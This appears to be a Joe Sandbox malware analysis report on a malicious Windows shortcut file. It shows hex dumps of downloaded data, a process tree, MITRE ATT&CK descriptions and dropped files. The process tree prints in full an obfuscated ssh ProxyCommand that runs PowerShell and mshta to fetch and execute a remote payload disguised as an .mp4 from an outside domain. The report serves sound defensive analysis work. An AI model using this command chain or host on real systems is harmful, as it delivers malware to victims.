2025-02-02 06:43:43 UTC	16384	IN	Data Raw: 1f 67 73 a0 09 a3 47 89 a7 fc 72 63 ef fa 72 08 70 3b 3b b6 1b 24 b6 3f ec 87 1e 4e ce 3f da ee a6 4e 8f af f1 d7 38 99 d3 ab fd c3 a5 6f cc 15 aa 07 cc c5 2b 82 05 18 0a 23 67 d9 62 41 c7 09 8f 57 b8 81 2e f1 1b 02 9c 18 c5 42 88 91 58 33 99 24 f9 c5 a7 fe dd b2 21 45 8b 84 87 53 8e 16 aa 46 98 d9 38 b4 db d5 cc a0 17 55 32 6f 88 cc 94 82 91 3c 80 6f ee a2 b4 7a 26 3b cd b4 52 78 fb eb 51 34 9f 2d 09 6c ce 21 c1 00 91 4a cd 25 cc 5e 61 4c ce 50 ef 82 ca 16 be 98 cb 11 10 c7 fc 62 fb 9b 8f 04 07 5d 26 c9 5e b7 14 2b dc e1 8a 3e 2e 58 8f 1d db 59 33 99 f2 fe aa 02 c5 a7 65 c0 42 f4 c5 4a 52 eb 14 b0 a3 28 dc 7f 09 66 be 37 bf 4d 55 9a a7 88 34 99 87 df 9c 4c 86 02 0d c9 f7 d3 14 49 bf 28 fa 62 51 d6 e2 5b 3d a1 93 fc ef e8 97 96 71 cc 30 f8 ab cd 44 32 cf Data Ascii: gsGrcrp;;$?N?N8o+#gbAW.BX3$!ESF8U2o<oz&;RxQ4-l!J%^aLPb]&^+>.XY3eBJR(f7MU4LI(bQ[=q0D2
2025-02-02 06:43:43 UTC	16384	IN	Data Raw: d5 a3 fe 93 76 9e 17 ed f2 55 7e fe 02 a6 dc a7 93 ac 7d df 2a 8d 6b e5 6b 80 07 61 b5 2c 77 8b d0 76 1f 46 15 36 33 07 8b b2 05 8e 59 e1 36 ed 8e b3 cc b8 41 38 9e ad b9 a5 0e 6f d1 86 fa a2 fc 19 e8 12 50 1c 19 dc cf 1f 6a 29 01 a1 16 8f 54 e3 48 96 1b e6 43 d4 8b 52 43 5d d8 3e ff d5 58 e8 e7 a8 05 01 84 d4 21 ef fe 22 90 15 b2 e5 f8 fb 7b 14 e2 bf e9 6e 11 2d cc ea 6b cc c0 c3 b4 a8 6c ba a9 f1 8f ca e1 8d ed 71 a2 a0 57 9b 9c d3 af 7e 92 98 ed a4 c5 b9 8e 31 85 4e f5 3a f6 62 f4 a0 53 83 6b 34 10 59 a6 b3 fa fe 4e 96 d1 fd 15 63 96 02 08 5c bc 96 8e 41 e5 83 7b dc e5 70 7d 39 f3 e9 6e 04 42 14 b7 3c 12 05 d3 e4 03 e8 48 9a ea 50 f6 a6 e7 85 e8 cd 08 64 aa ee d4 27 28 c8 10 96 cc 53 ab 83 90 be 89 63 a2 8c 4b ea 26 36 3b 1d dd 22 a2 c5 f0 ab 29 9a 9a Data Ascii: vU~}*kka,wvF63Y6A8oPj)THCRC]>X!"{n-klqW~1N:bSk4YNc\A{p}9nB<HPd'(ScK&6;")
2025-02-02 06:43:43 UTC	16384	IN	Data Raw: d2 43 c1 01 8b 2e 36 6a 3d af 5d 90 a5 81 da 15 3a bd 98 01 ab 3d 98 a0 f4 23 b5 98 a5 95 28 78 d8 e9 79 64 17 af ce 54 5f 2b e5 04 ad c0 19 e7 7d b2 e9 29 ef 81 ca e4 a4 80 7c 4a 15 a4 c2 ee 8e 3c 52 a5 ec 20 fa 4b 4c e0 50 f9 a0 69 e1 1e 1b ca 48 0b 4c 13 f0 f1 93 6c 3b a8 11 fe 96 9f 3a e8 45 26 09 3f 72 56 20 c2 50 c1 2c 31 df 48 fc 28 53 48 3b 44 39 cf b0 75 77 c2 73 0e 62 ae f7 a7 d4 01 e7 47 57 08 09 a7 c9 35 d9 a9 7d d5 d1 d1 1d 0d 15 57 dc c6 cd 54 89 41 63 eb ef 5b 93 c4 5c 7b 0b b4 84 14 5c 4d 4a 35 f6 c8 0a c8 9a 28 d6 b0 80 b3 76 4d 08 00 8e 6c ec 7e c7 7f 42 24 fb 4d d9 7f 62 35 cd ad 6a c4 76 74 8d 10 9c 63 c0 1d 17 37 6a 1f 37 f9 8c 23 77 54 a3 b9 78 9f 07 51 1e 6a 86 ec 18 f0 b0 8e 65 3d 9e 02 a1 5e 1f b8 96 89 d8 cd 83 64 f1 fa b8 94 b3 Data Ascii: C.6j=]:=#(xydT_+})\|J<R KLPiHLl;:E&?rV P,1H(SH;D9uwsbGW5}WTAc[\{\MJ5(vMl~B$Mb5jvtc7j7#wTxQje=^d
2025-02-02 06:43:43 UTC	16384	IN	Data Raw: 3e cd ea 93 e1 a6 e6 d1 ed d0 fe 18 db 78 a7 65 32 95 8c de 65 0b c1 99 48 bb 37 33 75 8f 94 b3 5c 7e 46 3e 25 2c 0f 13 fd 0d 2b d9 86 d2 3f b8 67 cb 97 cd d6 59 67 1f 15 9e 52 8a 2d e7 3d 8a 65 84 c8 8b b1 d8 9e af e6 c9 88 6c 9c c7 25 04 93 bd d1 6a 16 38 8a 2c d7 dc b6 05 c4 f4 8f 29 79 58 b5 2a 30 53 d9 16 1d 61 83 b9 29 a8 bd bc 66 8f 27 7c c8 b1 a8 9f 8e 5f a5 52 53 35 7c cc 8d 31 f7 be 85 d0 d5 a2 32 58 5c 5c 01 1a 19 67 a9 40 e4 71 f2 8d 11 80 ec b6 d3 40 eb 4f 0d 79 81 04 38 07 d5 0e aa 08 67 06 64 68 20 7d d0 c9 bd b4 3b af 41 4c 30 2e 03 03 6e ef 53 7c 69 d4 81 a1 dc 56 af 86 5e 16 8c c2 7f ad 40 4f 76 fd 04 b1 ad 46 fe de 75 01 e1 e4 f0 35 60 59 0a e1 fb e6 37 ab 6c 96 c1 f9 59 41 a6 99 91 1c 97 96 ce 45 dc cd 24 52 ce 05 36 bf 3b 96 19 45 78 Data Ascii: >xe2eH73u\~F>%,+?gYgR-=el%j8,)yX*0Sa)f'\|_RS5\|12X\\g@q@Oy8gdh };AL0.nS\|iV^@OvFu5`Y7lYAE$R6;Ex
2025-02-02 06:43:43 UTC	16384	IN	Data Raw: 81 ab 52 3f 0b b9 cf ab 13 83 74 65 00 fe ca 15 cc 5f 5d c9 29 6a 24 bd eb 57 00 ed d0 7e a7 51 2a fa 90 36 b4 60 e2 c7 e3 56 2c e3 55 f7 f9 22 56 57 eb 80 c1 0f 3d ad 67 3e 9a 37 bd 42 89 e8 3c 19 1e f0 7a 01 b8 5e 58 e5 42 ad dc 3b cf 32 92 ba b2 54 ca f0 01 32 2f 9b 69 ec de f3 d4 1a 0c f3 0b 87 f5 c4 e5 4d a9 27 fb 85 63 ca b8 f6 85 6b 4a 50 5b 4c 83 8a e8 ec 77 c6 df 4b e1 ec 3f ec 74 34 b0 59 81 5a 81 7c df e4 47 98 db cd 03 26 1e 5f 72 a1 e9 5b 8e 61 21 6e ad 02 5b ec ef cf 20 9f 29 a2 f9 aa 1f d9 8f 67 71 6b 34 75 91 53 d4 04 f4 be 5f 83 1f 80 f1 cc 83 4d b8 72 1c d9 12 46 7c 0c f0 9c e5 80 03 57 eb 38 cd 7d 8b a1 81 80 60 e0 03 7f 61 f5 4c e4 42 05 57 5f de 69 a5 5b 75 96 f7 5b 17 fa b3 02 33 81 80 be 23 01 3e 83 e1 41 03 43 37 4f 27 79 54 7f d9 Data Ascii: R?te_])j$W~Q*6`V,U"VW=g>7B<z^XB;2T2/iM'ckJP[LwK?t4YZ\|G&_r[a!n[ )gqk4uS_MrF\|W8}`aLBW_i[u[3#>AC7O'yT
2025-02-02 06:43:43 UTC	16384	IN	Data Raw: 3f ea 69 22 4e 73 75 8f 4b 66 7e ec 0a a0 a9 d8 d7 97 32 53 74 5a 99 18 ba be 10 22 60 38 56 a0 23 bf c3 71 33 38 00 7f 9e 7f 6b a9 20 15 81 f8 ac b4 4b 21 0e e5 39 c9 a4 4a eb 04 82 42 a4 a6 01 67 17 35 a0 17 b4 3f 97 20 e8 b7 35 6a af e2 1e fb 04 2c e0 3d f6 84 88 e1 89 0a 23 2e b0 25 96 c8 5b 36 e0 0f 75 77 2f 5e 2f 65 c8 df 48 e6 da 4c 13 ba 8a 09 3f 12 eb c8 1d 0f f6 ce 34 8d 96 8f c3 76 9f 39 ee cf 97 1d 34 5f fc 7d 45 d7 c9 59 91 53 62 d1 65 4d 9a 83 5c 90 51 91 1e e7 20 e1 5d c0 1a 4c 8f b2 69 c4 11 66 41 57 3d 0b b0 ce 5e 13 a0 c4 60 3a 47 bc cb 98 4d e9 80 6e ca de 2e e5 2a be 98 93 83 aa f9 c5 01 36 d0 b2 05 2f c5 a6 f3 26 e0 3a e2 ab d3 2f 94 53 9e 5f 31 cc 45 5b 8b dd ef 0e 87 e9 d4 89 20 a4 3c 26 d3 02 cc c7 28 ac 02 0a 58 d5 3a ec 29 d8 4c Data Ascii: ?i"NsuKf~2StZ"`8V#q38k K!9JBg5? 5j,=#.%[6uw/^/eHL?4v94_}EYSbeM\Q ]LifAW=^`:GMn.*6/&:/S_1E[ <&(X:)L
2025-02-02 06:43:43 UTC	16384	IN	Data Raw: 58 0b 70 75 18 96 5e 5e 96 b1 b0 86 b9 32 1f 90 8e c8 6b 2c b3 45 a4 81 2b 22 2d 9f 3e 2a e1 96 35 52 0c 4e e8 6b ac 7f 1c 5c 06 d5 8e 26 66 1c ee d2 49 a1 17 ed 22 43 10 50 e2 4f 7a c4 e6 b0 16 f2 fe ff 5d ab 7e 7a 07 85 4f 96 ab b6 b3 99 88 fd 3b 9f ea 5e e3 fb ae c5 4a 29 8a 30 d9 a0 23 d8 9f 80 83 1e fa 8b a3 4a 22 4e 00 d6 e8 89 d3 24 29 be 83 0c b9 32 d2 03 5b 5c 33 34 fc 56 0c 9c d7 8f bb d2 1b 5f 1c 3d ae 1d 13 96 a6 e6 bb d0 a4 3e dc 5e 70 ae 61 cb 0a 95 00 07 ec 0c a4 c4 9c 5f 96 b8 bf b3 f5 6d d1 09 04 78 ef bf 48 94 fe 24 f2 6f d2 54 3b dd e9 3b e5 d6 48 89 9a e5 e9 30 9d a8 e4 92 15 b5 9b 1a 2d 8b d9 75 20 d8 99 13 47 6c 68 82 4a 51 be 2f 28 06 b9 c2 ec a3 f3 89 4b d7 1c 61 8c b8 7c ba 44 56 2f 64 2e c9 78 76 36 e0 f9 80 32 b7 b0 5a be 69 1c Data Ascii: Xpu^^2k,E+"->*5RNk\&fI"CPOz]~zO;^J)0#J"N$)2[\34V_=>^pa_mxH$oT;;H0-u GlhJQ/(Ka\|DV/d.xv62Zi

Target ID:	0
Start time:	01:41:34
Start date:	02/02/2025
Path:	C:\Windows\System32\OpenSSH\ssh.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')" .
Imagebase:	0x7ff6a4620000
File size:	946'176 bytes
MD5 hash:	C05426E6F6DFB30FB78FBA874A2FF7DC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	01:41:34
Start date:	02/02/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	01:41:34
Start date:	02/02/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell powershell -C 'mshta'.Insert(5,' https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4')
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:41:35
Start date:	02/02/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -C "mshta https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:41:36
Start date:	02/02/2025
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\mshta.exe" https://docshare.icu/templates/imagesoftware/mediathek/videoanimationfloating.mp4
Imagebase:	0x7ff69f5c0000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 00007FFB4ABB33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1590848158.00007FFB4ABB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ABB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffb4abb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 05be53d6bc8c456438b2044531dc478a70aef4baa7280ae64ee546fe58dcaa6b
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 6901A77010CB0C8FD744EF0CE051AA6B3E0FB99320F10056DE58AC3691DA32E882CB41

Analysis Process: mshta.exePID: 6788, Parent PID: 2672COMMON

Executed Functions

Function 000001FB5EE40FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2820006570.000001FB5EE40000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001FB5EE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1fb5ee40000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 155c0d291c873a9e90fc6592bed7a647ca88d1be02858d8bd7c6c6e066b56856
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: EA9002154A941755D45525915C852AD50406788250FD484B0481790154D58D02961163

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report anov3mrRa1.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\videoanimationfloating[1].mp4

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apkkwayl.0qu.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyl0s0gn.irj.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqvo15zq.xu5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ix4rrpj1.wp4.psm1

Static File Info

General

File Icon

Static Windows Shortcut Info

General

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
anov3mrRa1.lnk